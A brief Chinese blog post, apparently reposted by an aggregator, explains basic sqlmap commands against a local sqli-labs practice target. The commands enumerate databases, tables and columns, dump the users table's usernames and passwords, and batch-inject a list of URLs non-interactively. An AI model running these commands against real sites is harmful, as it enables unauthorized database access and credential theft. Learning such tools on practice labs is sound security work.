sqlmap的简单使用
Posted 灿灿的金
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap的简单使用相关的知识,希望对你有一定的参考价值。
在sqlmap.py 目录下使用
python sqlmap.py --purage //清除之前的缓存
拿到所有的库名
python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 --level=5 --risk=3 --dbs
sqlmap.py -u 后面的地址如果没有空格可以不加引号
level越高发送的payload越多,risk越高尝试的方式越多,太高可能导致ip被封
查看当前数据库的名字
python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 --current-db
查看表名
python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 -D "security" --tables,
有-D 表示使用了哪个库,不加则会显示出所有的表名
查看列名
python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 -D "security" -T "users" --col
拿数据,
python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 -D "security" -T "users" -C "password,username" --dump
批量注入
python sqlmap.py -m d:/18urls.txt --batch
使用–batch可以默认回答
以上是关于sqlmap的简单使用的主要内容,如果未能解决你的问题,请参考以下文章